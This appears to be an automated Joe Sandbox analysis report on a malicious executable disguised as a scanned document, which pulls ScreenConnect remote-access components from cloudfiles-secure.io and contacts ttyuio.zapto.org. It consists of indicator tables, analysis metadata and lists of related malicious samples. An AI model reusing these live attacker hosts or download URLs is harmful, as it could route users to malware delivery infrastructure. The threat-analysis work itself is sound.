                  C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  cloudfiles-secure.io0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://www.fontbureau.com/designersG0%URL Reputationsafe
                  http://www.fontbureau.com/designers/?0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.fontbureau.com/designers?0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
                  http://www.fontbureau.com/designers0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://schemas.micro0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.fonts.com0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.fontbureau.com0%URL Reputationsafe
                  http://upx.sf.net0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.fontbureau.com/designers80%URL Reputationsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  cloudfiles-secure.io
                  178.215.236.119
                  truetrueunknown
                  fp2e7a.wpc.phicdn.net
                  192.229.221.95
                  truefalse
                    unknown
                    ttyuio.zapto.org
                    178.215.236.119
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.configtrue
                        unknown
                        https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exetrue
                          unknown
                          https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe.configtrue
                            unknown
                            https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exetrue
                              unknown
                              https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exetrue
                                unknown
                                https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifesttrue
                                  unknown
                                  https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dlltrue
                                    unknown
                                    https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.configtrue
                                      unknown
                                      https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dlltrue
                                        unknown
                                        https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exetrue
                                          unknown
                                          https://cloudfiles-secure.io/Bin/ScreenConnect.Client.dlltrue
                                            unknown
                                            https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dlltrue
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://www.fontbureau.com/designersGdfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileMana8dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationAdfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://www.fontbureau.com/designers/?dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://cloudfiles-secure.io/Bin/ScreenConnect.Client.dllJdfsvc.exe, 00000001.00000002.2639936321.00000261F99A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://www.founder.com.cn/cn/bThedfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exeOdfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://www.fontbureau.com/designers?dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dlll6dfsvc.exe, 00000001.00000002.2641523029.00000261F9B26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://cloudfiles-secure.io/Bin/ScreenConnectdfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://www.tiro.comdfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://g.live.com/odclientsettings/ProdV2.C:edb.log.5.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dllZdfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://www.fontbureau.com/designersdfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application%%%dfsvc.exe, 00000001.00000002.2641007006.00000261F9A75000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966264306.000000001ABC7000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965310592.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest1dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dlll7dfsvc.exe, 00000001.00000002.2641523029.00000261F9B26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://www.goodfont.co.krdfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.microdfsvc.exe, 00000001.00000002.2641485344.00000261F9B0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://cloudfiles-secure.io/BigScreenConnect.WindowsClient.exe, 00000009.00000002.1964806905.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://www.sajatypeworks.comdfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.typography.netDdfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://g.live.com/odclientsettings/Prod.C:edb.log.5.drfalse
                                                                      unknown
                                                                      http://www.founder.com.cn/cn/cThedfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://cloudfiles-secure.io/Bin/ScreenConnect.Clidfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://www.galapagosdesign.com/staff/dennis.htmdfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.edfsvc.exe, 00000001.00000002.2619140064.0000026180622000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.Wdfsvc.exe, 00000001.00000002.2619140064.00000261804A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://g.live.com/odclientsettings/ProdV2edb.log.5.drfalse
                                                                              unknown
                                                                              http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.2619140064.0000026180089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationlture=neutraQScreenConnect.WindowsClient.exe, 00000009.00000002.1966450277.000000001AC1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://cloudfiles-secure.iodfsvc.exe, 00000001.00000002.2619140064.0000026180622000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261807DC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.W0dfsvc.exe, 00000001.00000002.2619140064.00000261804A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.00000000022EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://www.galapagosdesign.com/DPleasedfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.w3.odfsvc.exe, 00000001.00000002.2619140064.00000261804C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.o5VTPZWXQ.log.1.drfalse
                                                                                            unknown
                                                                                            https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationEBdfsvc.exe, 00000001.00000002.2634391699.00000261F76E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://www.fonts.comdfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.sandoll.co.krdfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.urwpp.deDPleasedfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.zhongyicts.com.cndfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000001.00000002.2619140064.000002618001A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2961877052.0000000002016000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020769153.0000000002E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.sakkal.comdfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://crl3.digicert.dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6qmgr.db.5.dr, edb.log.5.drfalse
                                                                                                  unknown
                                                                                                  https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exe0dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.edfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://crl3.digicert.cScan_doc_09_16_24_1203.exe, 00000000.00000002.1950326930.00000000011EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.configCdfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationps_ScreenConnect.WindowsClient.exe, 00000009.00000002.1966450277.000000001AC1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://www.apache.org/licenses/LICENSE-2.0dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://www.fontbureau.comdfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.pdfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000001.00000002.2619140064.0000026180089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://schemas.microsoft.svchost.exe, 00000005.00000002.2960166987.0000013D88EB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://www.w3.ordfsvc.exe, 00000001.00000002.2619140064.0000026180354000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261804C8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261803F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://crl.ver)svchost.exe, 00000005.00000002.2961471636.0000013D8E211000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://upx.sf.netAmcache.hve.4.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicScreenConnect.WindowsClient.exe, 00000009.00000002.1964767967.0000000000594000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966344206.000000001ABE0000.00000004.00000020.00020000.00000000.sdmp, 5VTPZWXQ.log.1.drfalse
                                                                                                                          unknown
                                                                                                                          http://www.carterandcone.comldfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.fontbureau.com/designers/cabarga.htmlNdfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.founder.com.cn/cndfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationsadfsvc.exe, 00000001.00000002.2640737589.00000261F9A04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://www.fontbureau.com/designers/frere-user.htmldfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exeddfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96edb.log.5.drfalse
                                                                                                                                unknown
                                                                                                                                https://cloudfiles-secure.iodfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261801E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://cloudfiles-secure.io/Bin/ScreenConnect.Windfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.jiyu-kobo.co.jp/dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://cloudfiles-secure.io/Bin/ScreenConnect.ClientServidfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll0.1.drfalse
                                                                                                                                        unknown
                                                                                                                                        https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationdfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2639140020.00000261F9938000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261803F5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2640737589.00000261F9A04000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.00000000022E1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.00000000022EF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966264306.000000001ABC7000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966450277.000000001AC1D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.0000000002397000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.fontbureau.com/designers8dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://cloudfiles-secure.io/Bin/ScreenConnect.Client.appliScan_doc_09_16_24_1203.exe, 00000000.00000002.1950326930.00000000011EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exeodfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application561934e089ScreenConnect.WindowsClient.exe, 00000009.00000002.1964806905.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationestn32dfsvc.exe, 00000001.00000002.2640737589.00000261F9A04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsCliedfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    178.215.236.119
                                                                                                                                                    cloudfiles-secure.ioGermany
                                                                                                                                                    10753LVLT-10753UStrue
                                                                                                                                                    IP
                                                                                                                                                    127.0.0.1
                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                    Analysis ID:1523875
                                                                                                                                                    Start date and time:2024-10-02 06:15:22 +02:00
                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 8m 17s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                    Number of analysed new started processes analysed:15
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample name:Scan_doc_09_16_24_1203.exe
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal66.evad.winEXE@19/75@2/2
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 85.7%
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 60%
                                                                                                                                                    • Number of executed functions: 113
                                                                                                                                                    • Number of non-executed functions: 29
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 93.184.221.240, 192.229.221.95, 184.28.90.27, 20.42.73.29
                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                                                                                                                    • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 7452 because it is empty
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    00:16:17API Interceptor538420x Sleep call for process: dfsvc.exe modified
                                                                                                                                                    00:16:17API Interceptor1x Sleep call for process: Scan_doc_09_16_24_1203.exe modified
                                                                                                                                                    00:16:18API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                    00:16:40API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    178.215.236.119VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                      vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                        s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                          xkIXA8M8sC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                            VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                              vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                  Ge1x3MBwf4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                    tr5jscSEwo.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                      Ge1x3MBwf4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        ttyuio.zapto.orgVD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        xkIXA8M8sC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        Ge1x3MBwf4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        tr5jscSEwo.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        Ge1x3MBwf4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        cloudfiles-secure.ioHe6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 188.119.113.59
                                                                                                                                                                        5eRyCYRR9y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 188.119.113.59
                                                                                                                                                                        VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        xkIXA8M8sC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        He6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 188.119.113.59
                                                                                                                                                                        fp2e7a.wpc.phicdn.nethttps://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 192.229.221.95
